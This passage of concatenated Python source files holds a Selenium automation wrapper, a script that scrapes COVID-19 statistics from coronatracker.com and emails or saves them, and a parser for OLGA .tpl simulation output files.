time import sleep, time\r\n\t\tstart = time()\r\n\t\twhile True:\r\n\t\t\tif exists(path): return True\r\n\t\t\telapsed = time() - start\r\n\t\t\tif elapsed > self.timeout:\r\n\t\t\t\tif raise_errors:\r\n\t\t\t\t\traise AssertionError(message + path)\r\n\t\t\t\treturn False\r\n\t\t\tsleep(self._WAIT_POLL_EACH)\r\n\r\n\tdef select(self, element, wait: bool = True, all: bool = False, raise_errors: bool = None):\r\n\t\tfrom selenium.webdriver.remote.webelement import WebElement\r\n\t\tif isinstance(element, WebElement): return element\r\n\t\tfound = self.wait(element, raise_errors=not all if raise_errors is None else raise_errors) if wait else False\r\n\t\tif all:\r\n\t\t\treturn self.driver.find_elements_by_css_selector(element)\r\n\t\telif found:\r\n\t\t\treturn self.driver.find_element_by_css_selector(element)\r\n\r\n\tdef write(self, element, text: str, clear: bool = False) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tfrom selenium.webdriver.common.keys import Keys\r\n\t\tfrom time import sleep\r\n\t\telement = self.select(element)\r\n\t\tif clear:\r\n\t\t\tself.click(element)\r\n\t\t\tActionChains(self.driver).key_down(Keys.CONTROL).send_keys('a').key_up(Keys.CONTROL).send_keys(Keys.BACKSPACE).perform()\r\n\t\tfor char in text:\r\n\t\t\telement.send_keys(self.translate(char))\r\n\t\t\tsleep(self.keystroke_delay)\r\n\r\n\tdef press(self, text: str):\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tfrom time import sleep\r\n\t\tfor char in text:\r\n\t\t\tActionChains(self.driver).send_keys(self.translate(char)).perform()\r\n\t\t\tsleep(self.keystroke_delay)\r\n\r\n\tdef click(self, element) -> None:\r\n\t\tself.select(element).click()\r\n\r\n\tdef hover(self, element) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tActionChains(self.driver).move_to_element(self.select(element)).perform()\r\n\r\n\tdef focus(self, element) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tActionChains(self.driver).move_to_element(self.select(element)).click().perform()\r\n\r\n\tdef drag(self, element, x_offset: int = 0, y_offset: int = 0) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tActionChains(self.driver).drag_and_drop_by_offset(self.select(element), x_offset, y_offset).perform()\r\n\r\n\tdef scroll(self, element, x_delta: float = 0, y_delta: float = 0, mouse_x: float = 0, mouse_y: float = 0) -> None:\r\n\t\tself.driver.execute_script('''arguments[0].dispatchEvent(new WheelEvent(\"wheel\", { bubbles: true,\r\n\t\t\tdeltaX: arguments[1], deltaY: arguments[2], clientX: arguments[3], clientY: arguments[4]\r\n\t\t}))''', self.select(element), x_delta, y_delta, mouse_x, mouse_y)\r\n\r\n\tdef scroll_into_view(self, element):\r\n\t\tself.driver.execute_script('arguments[0].scrollIntoView({\"block\":\"center\"});', self.select(element))\r\n\r\n\tdef attribute(self, element, attribute: str, value: Optional[str] = None) -> Optional[str]:\r\n\t\targs = [self.select(element), attribute]\r\n\t\tif value is None:\r\n\t\t\tscript = 'return !arguments[0].hasAttribute(arguments[1]) ? 
null : arguments[0].getAttribute(arguments[1])'\r\n\t\telse:\r\n\t\t\tscript = 'arguments[0].setAttribute(arguments[1], arguments[2])'\r\n\t\t\targs.append(value)\r\n\t\treturn self.driver.execute_script(script, *args)\r\n\r\n\tdef style(self, element, property: str, value: Optional[str] = None) -> Optional[str]:\r\n\t\targs = [self.select(element), property]\r\n\t\tif value is None:\r\n\t\t\tscript = 'return getComputedStyle(arguments[0])[arguments[1]]'\r\n\t\telse:\r\n\t\t\tscript = 'arguments[0].style[arguments[1]] = arguments[2]'\r\n\t\t\targs.append(value)\r\n\t\treturn self.driver.execute_script(script, *args)\r\n\r\n\tdef has_class(self, element, class_name: str) -> bool:\r\n\t\treturn self.driver.execute_script(\r\n\t\t\t'return arguments[0].classList.contains(arguments[1])',\r\n\t\t\tself.select(element),\r\n\t\t\tclass_name\r\n\t\t)\r\n\r\n\tdef cookie(\r\n\t\tself, name: str, value: Optional[str] = None, expiry: int = None, delete: bool = False,\r\n\t\tpath: str = None, domain: str = None, http_only: str = None, secure: str = None\r\n\t) -> Optional[str]:\r\n\t\tfrom time import time\r\n\t\tif delete:\r\n\t\t\tself.driver.delete_cookie(name)\r\n\t\telif value is None:\r\n\t\t\treturn self.driver.get_cookie(name)['value']\r\n\t\telse:\r\n\t\t\tcookie = {'name': name, 'value': value, 'path': '/'}\r\n\t\t\tcookie['expiry'] = expiry if expiry is not None else int(time() + self._YEAR_SECONDS)\r\n\t\t\tif path is not None: cookie['path'] = path\r\n\t\t\tif domain is not None: cookie['domain'] = domain\r\n\t\t\tif http_only is not None: cookie['httpOnly'] = http_only\r\n\t\t\tif secure is not None: cookie['secure'] = secure\r\n\t\t\tself.driver.add_cookie(cookie)\r\n\r\n\tdef local_storage(self, key: str, value: Optional[str] = None, delete: bool = False) -> Optional[str]:\r\n\t\tif delete:\r\n\t\t\tself.driver.execute_script('localStorage.removeItem(arguments[0])', key)\r\n\t\telif value is None:\r\n\t\t\treturn self.driver.execute_script('return localStorage.getItem(arguments[0])', key)\r\n\t\telse:\r\n\t\t\tself.driver.execute_script('localStorage.setItem(arguments[0], arguments[1])', key, value)\r\n\r\n\tdef session_storage(self, key: str, value: Optional[str] = None, delete: bool = False) -> Optional[str]:\r\n\t\tif delete:\r\n\t\t\tself.driver.execute_script('sessionStorage.removeItem(arguments[0])', key)\r\n\t\telif value is None:\r\n\t\t\treturn self.driver.execute_script('return sessionStorage.getItem(arguments[0])', key)\r\n\t\telse:\r\n\t\t\tself.driver.execute_script('sessionStorage.setItem(arguments[0], arguments[1])', key, value)\r\n\r\n\tdef all_cookies(self, clear: bool = True, path: str = None, domain: str = None, http_only: str = None, secure: str = None) -> dict:\r\n\t\tres = {\r\n\t\t\tc['name']: c['value']\r\n\t\t\tfor c in self.driver.get_cookies()\r\n\t\t\tif (path is None or c['path'] == path)\r\n\t\t\tand (domain is None or c['domain'] == domain)\r\n\t\t\tand (http_only is None or c['httpOnly'] == http_only)\r\n\t\t\tand (secure is None or c['secure'] == secure)\r\n\t\t}\r\n\t\tif clear:\r\n\t\t\tself.driver.delete_all_cookies()\r\n\t\treturn res\r\n\r\n\tdef all_local_storage(self, clear: bool = True) -> dict:\r\n\t\tres = {k: v for k, v in self.driver.execute_script('return Object.entries(localStorage)')}\r\n\t\tif clear:\r\n\t\t\tself.driver.execute_script('localStorage.clear()')\r\n\t\treturn res\r\n\r\n\tdef all_session_storage(self, clear: bool = True) -> dict:\r\n\t\tres = {k: v for k, v in self.driver.execute_script('return 
Object.entries(sessionStorage)')}\r\n\t\tif clear:\r\n\t\t\tself.driver.execute_script('sessionStorage.clear()')\r\n\t\treturn res\r\n\r\n\tdef box(self, element) -> Tuple[float, float]:\r\n\t\tres = self.driver.execute_script('return arguments[0].getBoundingClientRect()', self.select(element))\r\n\t\tres['center_left'] = res['left'] + res['width'] / 2\r\n\t\tres['center_top'] = res['top'] + res['height'] / 2\r\n\t\treturn res\r\n\r\n\tdef translate(self, char: str) -> str:\r\n\t\tfrom selenium.webdriver.common.keys import Keys\r\n\t\tif char == '\\t':\r\n\t\t\treturn Keys.TAB\r\n\t\telif char == '\\n':\r\n\t\t\treturn Keys.ENTER\r\n\t\telse:\r\n\t\t\treturn char\r\n\r\n\tdef console_clear(self):\r\n\t\tself.driver.execute_script('window.CONSOLE_MESSAGES = []')\r\n\r\n\tdef console_messages(self, group_by_level: bool = False) -> Dict[str, str]:\r\n\t\tmessages = self.driver.execute_script('return CONSOLE_MESSAGES')\r\n\t\tif group_by_level:\r\n\t\t\tres = {}\r\n\t\t\tfor level, message in messages:\r\n\t\t\t\tres.setdefault(level, []).append(message)\r\n\t\t\treturn res\r\n\t\telse:\r\n\t\t\treturn [m[1] for m in messages]","repo_name":"juancroldan/simpler","sub_path":"simpler/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":12956,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"3529835464","text":"from selenium import webdriver\r\nimport smtplib\r\nimport email.message\r\nimport time\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport PySimpleGUI as sg\r\n\r\n#Criado por Fabio Augusto\r\n\r\nclass Tracker():\r\n def __init__(self):\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n self.driver = webdriver.Chrome(executable_path=r'./chromedriver.exe',options=chrome_options)\r\n print('entrando no site...')\r\n self.driver.get('https://www.coronatracker.com/pt-br')\r\n self.email_message = email.message.Message()\r\n time.sleep(3)\r\n print('feito')\r\n\r\n def varrer(self):\r\n #varre dados do mundo\r\n print('iniciando varredura de dados mundial...')\r\n curados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[2]/div[1]')\r\n print('curados ok')\r\n confirmados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]')\r\n print('confirmados ok')\r\n obitos = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[3]/div[1]')\r\n print('obitos ok')\r\n print('convertendo para texto')\r\n self.confirmados = confirmados.text\r\n print('confirmados ok')\r\n self.curados = curados.text\r\n print('curados ok')\r\n self.obitos = obitos.text\r\n print('obitos ok')\r\n print('feito')\r\n #varre dados do Brasil\r\n print('alterando fonte de dados para o BR...')\r\n self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[1]/button').click()\r\n self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[1]/ul/li[4]/a').click()\r\n time.sleep(3)\r\n print('feito')\r\n print('iniciando varredura de dados do Brasil ')\r\n br_confirmados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]')\r\n print('confirmados ok')\r\n br_curados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[2]/div[1]')\r\n print('curados ok')\r\n br_obitos = 
self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[3]/div[1]')\r\n print('obitos ok')\r\n print('feito')\r\n print('convertendo para texto')\r\n self.br_confirmados = br_confirmados.text\r\n print('confirmados ok')\r\n self.br_curados = br_curados.text\r\n print('curados ok')\r\n self.br_obitos = br_obitos.text\r\n print('obitos ok')\r\n print('dados varridos com sucesso!')\r\n time.sleep(2)\r\n\r\n def enviar_email(self, email,senha,destino):\r\n self.email = email\r\n self.senha = senha\r\n self.destino = destino\r\n print('definindo corpo do email..')\r\n corpo_email = f\"\"\"\r\n
        CORONA VIRUS STATUS        \r\n        \r\n        Corona virus no mundo        \r\n        \r\n        confirmados: {self.confirmados}        \r\n        curados:{self.curados}        \r\n        mortos: {self.obitos}        \r\n        \r\n        \r\n        \r\n        Corona no Brasil        \r\n        \r\n        confirmados:{self.br_confirmados}        \r\n        curados: {self.br_curados}        \r\n        mortos:{self.br_obitos}        \r\n        \r\n        \r\n        Dados retirados instantaneamente do site CoronaTrack disponivel em https://www.coronatracker.com/pt-br
        \r\n \"\"\"\r\n print('feito')\r\n print('enviando email')\r\n msg = self.email_message\r\n msg['Subject'] = \"Dados do Corona\"\r\n msg['From'] = self.email\r\n msg['To'] = self.destino\r\n password = self.senha \r\n msg.add_header('Content-Type', 'text/html')\r\n msg.set_payload(corpo_email )\r\n\r\n s = smtplib.SMTP('smtp.gmail.com: 587')\r\n s.starttls()\r\n s.login(msg['From'], password)\r\n s.sendmail(msg['From'], [msg['To']], msg.as_string().encode('utf-8'))\r\n print(f'Email enviado com sucesso para {self.destino}')\r\n time.sleep(2)\r\n \r\n def gravar_txt(self):\r\n #grava os dados do corona no mundo:\r\n print('criando arquivo')\r\n arquivo = open('casosdocorona.txt', \"w\", encoding='UTF-8')\r\n print('gravando dados do mundo...')\r\n arquivo.write('#CASOS DO CORONA NO MUNDO\\n')\r\n arquivo.write('Casos confirmados: ')\r\n arquivo.write(self.confirmados)\r\n arquivo.write('\\n')\r\n arquivo.write('Casos curados:')\r\n arquivo.write(self.curados) \r\n arquivo.write('\\n')\r\n arquivo.write('Casos com mortes: ')\r\n arquivo.write(self.obitos)\r\n arquivo.write('\\n\\n')\r\n print('feito!')\r\n \r\n #grava os dados do corona no Brasil\r\n print('gravando dados do Brasil...')\r\n arquivo.write('#CASOS DO CORONA NO BRASIL')\r\n arquivo.write('\\n')\r\n arquivo.write('confirmados:')\r\n arquivo.write(self.br_confirmados)\r\n arquivo.write('\\n')\r\n arquivo.write('Curados: ')\r\n arquivo.write(self.br_curados)\r\n arquivo.write('\\n')\r\n arquivo.write('Óbitos: ' )\r\n arquivo.write(self.br_obitos)\r\n print('feito')\r\n arquivo.close()\r\n print('arquivo gravado com sucesso!')\r\n\r\n \r\nclass Tela():\r\n def __init__(self):\r\n layout = [\r\n [sg.Text('varredura do site Coronatrack')],\r\n [sg.Text('digite o email de destino'),sg.Input(key='destino')],\r\n [sg.Text('digite o seu email'),sg.Input(key='remetente')],\r\n [sg.Text('digite sua senha'),sg.Input(key='senha')],\r\n [sg.Checkbox('Enviar Email',key='enviar'), sg.Checkbox('Gravar em um arquivo de texto', key='gravar')],\r\n [sg.Button('iniciar varredura')],\r\n [sg.Output(size=(30,30))]\r\n ] \r\n self.janela = sg.Window('Dados do Corona').layout(layout)\r\n \r\n\r\n\r\n def ir(self):\r\n while True:\r\n self.button, self.values = self.janela.Read()\r\n self.destino = self.values['destino']\r\n self.remetente = self.values['remetente']\r\n self.senha = self.values['senha']\r\n self.enviar = self.values['enviar']\r\n self.gravar = self.values['gravar']\r\n self.corona = Tracker()\r\n self.corona.varrer()\r\n if self.enviar == True:\r\n self.corona.enviar_email(self.remetente,self.senha,self.destino)\r\n else:\r\n pass\r\n if self.gravar == True:\r\n self.corona.gravar_txt()\r\n else: pass\r\n\r\n\r\ndef main():\r\n teste = Tela()\r\n teste.ir()\r\n\r\n\r\nif __name__=='__main__':\r\n main()","repo_name":"augstfabio/automa-o-com-python","sub_path":"coronatrack.py","file_name":"coronatrack.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73610341607","text":"import os\nimport re\nimport platform\nimport numpy as np\nimport pandas as pd\nfrom easy_deco import progress_bar, raise_error\nfrom rackio_AI.readers.tpl.options import TPLOptions\nfrom easy_deco.del_temp_attr import set_to_methods, del_temp_attr\n\n\n@set_to_methods(del_temp_attr)\nclass TPL:\n \"\"\"\n **TPL** class allows to you load into RackioAI .tpl files in pandas.DataFrame format.\n \"\"\"\n\n tpl_options = TPLOptions()\n _instances = list()\n\n def 
__init__(self):\n\n self.file_extension = \".tpl\"\n self.doc = list()\n # self.genkey = list()\n self.settings = dict()\n TPL._instances.append(self)\n\n def read(self, name, **kwargs):\n \"\"\"\n Read .tpl files\n\n ___\n **Paramaters**\n\n * **:param name:** (str) if *name* is a directory, it reads all .tpl files in that directory.\n If *name* is a .tpl file, it reads only that file\n\n **:return:**\n\n * **doc:** (list[dict]) tpl file reaformated in dictionaries\n ___\n\n ## Snippet code\n\n ```python\n >>> import os\n >>> from rackio_AI import RackioAI, get_directory\n >>> name = os.path.join(get_directory('Leak'), 'Leak01.tpl')\n >>> RackioAI.load(name)\n tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file\n variable Pressure ... Controller_output filename\n unit S PA ... .tpl\n 0 0.000000 568097.3 ... 0.0 Leak01\n 1 0.502732 568098.2 ... 0.0 Leak01\n 2 1.232772 568783.2 ... 0.0 Leak01\n 3 1.653696 569367.3 ... 0.0 Leak01\n 4 2.200430 569933.5 ... 0.0 Leak01\n ... ... ... ... ... ...\n 3214 1618.327000 569341.1 ... 0.0 Leak01\n 3215 1618.849000 569341.3 ... 0.0 Leak01\n 3216 1619.370000 569341.5 ... 0.0 Leak01\n 3217 1619.892000 569341.7 ... 0.0 Leak01\n 3218 1620.413000 569341.9 ... 0.0 Leak01\n \n [3219 rows x 12 columns]\n\n ```\n \"\"\"\n self.doc = self.__read_files(name, **kwargs)\n\n return self.doc\n\n def __read_file(self, filename, **kwargs):\n \"\"\"\n Read only one .tpl file\n\n ___\n **Parameters**\n\n **:param filename:** (str) tpl filename\n\n **:return:**\n\n * **doc:** (dict) .tpl file in a dictionary\n\n ___\n\n ## Snippet code\n\n ```python\n >>> import os\n >>> from rackio_AI import RackioAI, get_directory\n >>> name = os.path.join(get_directory('Leak'), 'Leak01.tpl')\n >>> RackioAI.load(name)\n tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file\n variable Pressure ... Controller_output filename\n unit S PA ... .tpl\n 0 0.000000 568097.3 ... 0.0 Leak01\n 1 0.502732 568098.2 ... 0.0 Leak01\n 2 1.232772 568783.2 ... 0.0 Leak01\n 3 1.653696 569367.3 ... 0.0 Leak01\n 4 2.200430 569933.5 ... 0.0 Leak01\n ... ... ... ... ... ...\n 3214 1618.327000 569341.1 ... 0.0 Leak01\n 3215 1618.849000 569341.3 ... 0.0 Leak01\n 3216 1619.370000 569341.5 ... 0.0 Leak01\n 3217 1619.892000 569341.7 ... 0.0 Leak01\n 3218 1620.413000 569341.9 ... 
0.0 Leak01\n \n [3219 rows x 12 columns]\n\n ```\n \"\"\"\n\n doc = dict()\n\n (data_header_section, data) = self.__get_section_from(filename)\n header_section = self.__get_header_section(data_header_section)\n (filename, _) = os.path.splitext(filename)\n\n multi_index = list()\n\n for count, column_name in enumerate(header_section):\n column_name = self.__clean_column_name(column_name)\n\n (tag, unit, variable_type) = self.__get_structure(column_name)\n multi_index.append((tag, variable_type, unit))\n \"fill dictionary\"\n doc[tag] = data[:, count]\n\n data_name = np.array([filename.split(os.path.sep)[-1]] * data.shape[0])\n\n multi_index.append(('file', 'filename', '.tpl'))\n doc['file'] = data_name\n\n self.header = pd.MultiIndex.from_tuples(\n multi_index, names=['tag', 'variable', 'unit'])\n\n # Read Genkey\n\n if hasattr(self, '_join_files'):\n\n _attr = getattr(self, '_join_files')\n\n if not _attr:\n\n genkey_filename = filename.split(os.path.sep)\n genkey_filename.pop(-2)\n genkey_filename = os.path.join(*genkey_filename) + '.genkey'\n genkey = Genkey()\n genkey.read(filename=genkey_filename)\n doc['genkey'] = genkey\n\n # Provisional meanwhile read settings is not implemented.\n doc['settings'] = self.settings\n\n return doc\n\n @progress_bar(desc='Loading .tpl files...', unit='files', gen=True)\n def __read_files(self, filenames, **kwargs):\n \"\"\"\n Read all .tpl files in a list of filenames\n\n ___\n **Parameters**\n\n **:param filenames:** list['str'] filenames list\n\n **:return:**\n\n * **doc:** (list[dict]) tpl file reformated in dictionaries\n\n \"\"\"\n\n return self.__read_file(filenames, **kwargs)\n\n @raise_error\n def __get_section_from(self, filename):\n \"\"\"\n Get time profile section separated by key word in tpl_options.split_expression, for OLGA .tpl files this key is\n CATALOG\n\n ___\n **Parameters**\n\n * **filename:** (str)\n\n **:return:**\n\n * **(data_header_section, data):**\n * **data_header_section:** list['str'] .tpl file header section\n * **data:** (np.ndarray) data section\n\n ```\n \"\"\"\n with open(filename, 'r') as file:\n file = file.read()\n\n sections = file.split(\"{} \\n\".format(\n self.tpl_options.split_expression))\n\n self.tpl_options.header_line_numbers = int(sections[1].split('\\n')[0])\n\n data_header_section = sections[1].split('\\n')\n\n data = self.__get_data(\n data_header_section[self.tpl_options.header_line_numbers + 2::])\n\n return data_header_section, data\n\n def __get_header_section(self, data_header_section):\n \"\"\"\n Get header section tag description of .tpl file\n\n ___\n **Parameters**\n\n * **data_header_section:** list['str'] .tpl file header section\n\n **:return:**\n\n * **header_section:** list('str') each item in the list is tag variable summary in .tpl files\n\n \"\"\"\n header_section = data_header_section[1:\n self.tpl_options.header_line_numbers + 2]\n\n return header_section[-1:] + header_section[:-1]\n\n @staticmethod\n def __get_data(data):\n \"\"\"\n Get time profile section separated by key word in tpl_options.split_expression, for OLGA .tpl files this key is\n CATALOG\n\n **Parameters**\n\n * **data:** (np.ndarray) data section with elements in np.ndarray are strings\n **:return:**\n\n * **data:** (np.ndarray)\n \"\"\"\n rows = len(data)\n new_data = list()\n\n for count, d in enumerate(data):\n\n if count == rows - 1:\n break\n\n new_data.append(np.array([float(item) for item in d.split(\" \")]))\n\n return np.array(new_data)\n\n @staticmethod\n def __clean_column_name(column_name):\n \"\"\"\n\n 
**Parameters**\n\n * **:param column_name:** (str)\n\n **:return:**\n\n * **column_name:** ('str')\n\n \"\"\"\n\n return column_name.replace(\"'\", \"\").replace(\":\", \"\").replace(\" \", \"_\").replace(\"-\", \"\").replace(\"__\", \"_\")\n\n @staticmethod\n def __get_tag(column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n tag = column_name[0:column_name.find(\"(\") - 1]\n\n if tag.endswith(\"_\"):\n tag = tag[0:-1]\n\n return tag\n\n @staticmethod\n def __get_unit(column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n return column_name[column_name.find(\"(\") + 1:column_name.find(\")\")]\n\n @staticmethod\n def __get_variable_type(column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n return column_name[column_name.find(\")\") + 2::]\n\n def __get_structure(self, column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n tag = self.__get_tag(column_name)\n\n unit = self.__get_unit(column_name)\n\n variable_type = self.__get_variable_type(column_name)\n\n return tag, unit, variable_type\n\n def __to_dataframe(self, join_files: bool = True):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n None\n\n **:return:**\n\n \"\"\"\n return self.__join(flag=join_files)\n\n def __to_series(self):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n None\n\n **:return:**\n\n \"\"\"\n return self.__join(flag=False)\n\n def __to_csv(self, **kwargs):\n \"\"\"\n ...Documentation here...\n\n **Paramters**\n\n * **:param kwargs:**\n\n **:return:**\n\n \"\"\"\n df = self.__join(flag=True)\n\n df.to_csv(os.path.join(kwargs['path'], kwargs['filename']))\n\n @staticmethod\n def __coerce_df_columns_to_numeric(df, column_list):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param df:**\n * **:param column_list:**\n\n **:return:**\n\n \"\"\"\n df[column_list] = df[column_list].apply(pd.to_numeric, errors='coerce')\n\n return df\n\n def __join(self, flag=True):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param flag:**\n\n **:return:**\n\n \"\"\"\n if flag:\n\n # Making dataframes\n d = self.__making_dataframes(self.doc)\n df = pd.concat(d)\n change = [key[0] for key in self.header.values if key[0] != 'file']\n df = self.__coerce_df_columns_to_numeric(df, change)\n\n return df\n\n else:\n # columns = self.doc[0].keys()\n index_name = list()\n new_data = list()\n\n for count, data in enumerate(self.doc):\n\n # print(f\"data: {data}\")\n columns = data.keys()\n attrs = [data[key] for key in columns if key !=\n 'genkey' and key != 'settings']\n # breakpoint()\n index_name.append('Case{}'.format(count))\n\n new_data.append({\n 'tpl': pd.DataFrame(np.array(attrs).transpose(), columns=self.header),\n 'genkey': data['genkey'],\n 'settings': data['settings']\n }\n )\n # breakpoint()\n # print(f\"New Data: {new_data}\")\n # data = pd.Series(new_data)\n # data.index = index_name\n\n return new_data\n\n def to(self, data_type, join_files: bool = True, **kwargs):\n \"\"\"\n This method allows to you transform from .tpl to a 'data_type'\n\n **Parameers**\n\n * **:param data_type:** (str) 'dataframe' - 'series' - 'csv'\n * **:param kwargs:**\n * **filename:** (str) 'name.csv' if date_type == 'csv'\n * **path:** (str ) path to save csv file\n\n **:return:**\n\n \"\"\"\n\n kwargs_default 
= {'path': os.getcwd(),\n 'filename': 'tpl_to_csv.csv'}\n options = {key: kwargs[key] if key in kwargs.keys(\n ) else kwargs_default[key] for key in kwargs_default.keys()}\n\n if data_type.lower() == 'dataframe':\n\n return self.__to_dataframe(join_files=join_files)\n\n elif data_type.lower() == 'series':\n\n return self.__to_series()\n\n elif data_type.lower() == 'csv':\n\n self.__to_csv(**options)\n\n return self.doc\n\n else:\n\n raise NameError('{} is not possible convert to {}'.format(\n type(self).__name__, data_type.lower()))\n\n def __making_dataframes(self, doc):\n \"\"\"\n\n \"\"\"\n for data in doc:\n\n yield pd.DataFrame(map(list, zip(*list(data.values()))), columns=self.header)\n\n\nclass Genkey(dict):\n\n def __init__(self, *args, **kwargs):\n self.__previous_line = None\n self.__previous_item = None\n self._keys = list()\n super().__init__(*args, **kwargs)\n\n def set_previous_item(self, item: str):\n\n self.__previous_item = item\n\n def get_previous_item(self) -> str:\n\n return self.__previous_item\n\n def set_previous_line(self, line: str):\n\n self.__previous_line = line\n\n def get_previous_line(self):\n\n return self.__previous_line\n\n def __append_key(self, key: str):\n\n if key not in self.__get_keys():\n\n self._keys.append(key)\n\n def __clean_keys(self):\n\n self._keys = list()\n\n def __clean_last_key(self):\n\n self._keys.pop(-1)\n\n def __get_keys(self):\n\n return self._keys\n\n # def __setitem__(self, key: str, value=None):\n\n # if key in self.keys():\n\n # _value = self.__getitem__(key)\n\n # if _value is None:\n\n # _value = list()\n\n # if isinstance(_value, list):\n\n # _value.append(value)\n\n # return super().__setitem__(key, _value)\n\n # return super().__setitem__(key, Genkey())\n\n # def __getitem__(self, key: str):\n\n # return super().__getitem__(key)\n\n # def read(self, filename: str):\n # r\"\"\"\n # Documentation here\"\"\"\n # with open(filename, \"r\") as file:\n\n # lines = file.readlines()\n\n # for line in lines:\n\n # previous_line = self.get_previous_line()\n\n # if previous_line:\n\n # line = previous_line.replace(\"\\\\\", line.lstrip())\n\n # # Join line continuation\n # if \"\\\\\" in line:\n # line.replace(\"\\\\\", \"\")\n # self.set_previous_line(line)\n # continue\n # else:\n\n # self.set_previous_line(None)\n\n # if line.startswith(\"!*\"):\n\n # continue\n\n # # if line.startswith(\" \"):\n\n # # continue\n\n # # Setting first level keys\n # if line.strip().startswith(\"! 
\"):\n # self.__clean_keys()\n # key = line.strip().split(\"!\")[1].strip()\n # self.__append_key(key)\n # self.__setitem__(key)\n\n # # breakpoint()\n\n # continue\n\n # # Setting second level keys\n # value = re.search('\\w+\\s', line)\n # if not value:\n\n # continue\n\n # _key = value.group(0)\n # _items = line.split(f\"{_key}\")[-1]\n # self.__append_key(_key.lstrip().rstrip())\n\n # _items = _items.split(\", \")\n # # print(f\"Items: {_items}\")\n\n # # Iteration in last key - value\n # for item in _items:\n # # Is an item key - value\n # breakpoint()\n # if \"=\" in item:\n # previous_item = self.get_previous_item()\n # if previous_item:\n # key, value = self.get_previous_item().split(\"=\")\n # self.__append_key(key)\n # continue\n # # print(f\"Keys: {self.__get_keys()}\")\n # # print(f\"value: {value}\")\n # self.set_previous_item(item)\n # # key, value = self.get_previous_item().split(\"=\")\n # self.__setitem__(key=self._key)\n\n # self.__clean_last_key()\n # continue\n\n # # This item belongs to previous item\n # else:\n\n # _item = self.get_previous_item() + \", \" + item\n # self.set_previous_item(_item)\n\n # self.__clean_last_key()\n\n # TODO: Refactor and document the class' methods.\n\n def clean_lines(self, lines: str):\n '''\n Documentation here\n '''\n # Append lines when it has \\\\\n _el = ''\n broken_lines = []\n for el in lines.split('\\n'):\n if re.search('\\\\\\\\', el):\n if not _el:\n _el = el\n continue\n _el += el\n continue\n\n if el.find('\\\\\\\\') == -1 and _el and bool(el.strip()):\n _el += el\n _el = ' '.join([e.strip() for e in _el.split('\\\\')])\n broken_lines.append(_el.strip())\n _el = ''\n continue\n\n if bool(el.strip()):\n broken_lines.append(el.strip())\n\n # Append lines when it starts with third level key\n _el = ''\n fixed_lines = []\n second_key_pattern = re.compile(r'^[a-zA-Z]+\\s\\w+')\n third_key_pattern = re.compile(r'^[a-zA-Z]+\\=|^[a-zA-Z]+\\s\\=')\n\n for line in broken_lines:\n if second_key_pattern.search(line):\n _el = line\n fixed_lines.append(line)\n continue\n\n if third_key_pattern.search(line):\n line = ' ' + line\n _el += line\n fixed_lines.append(_el)\n continue\n\n return fixed_lines\n\n def split_values(self, line):\n '''\n Documentation here\n '''\n _info = ''\n _el = ''\n clean_line = []\n flag = False\n second_key_pattern = re.compile(r'^[A-Z]+\\s')\n opening_third_key_pattern_1 = re.compile(\n r'^[A-Z]+\\=\\(|^[A-Z]+\\s\\=\\s\\(')\n opening_third_key_pattern_2 = re.compile(r'^[A-Z]+\\=\\(')\n third_key_pattern = re.compile(r'^[A-Z]+\\=')\n closing_third_key_pattern = re.compile(r'\\)$|\\)\\s.+$')\n\n for el in line.split(', '):\n if second_key_pattern.search(el):\n splited_line = el.split(' ')\n clean_line.append(splited_line[0])\n second_key = ' '.join([e for e in splited_line[1:]])\n\n if opening_third_key_pattern_1.search(second_key):\n _el = second_key\n flag = True\n continue\n el = second_key\n clean_line.append(el)\n continue\n\n if opening_third_key_pattern_2.search(el):\n _el = el\n flag = True\n continue\n\n if third_key_pattern.search(el):\n if re.search(r'^INFO', el):\n _info = el\n continue\n\n clean_line.append(el)\n continue\n\n if re.search(r'^INFO', _info):\n _info = _info + ', ' + el\n clean_line.append(_info)\n _info = 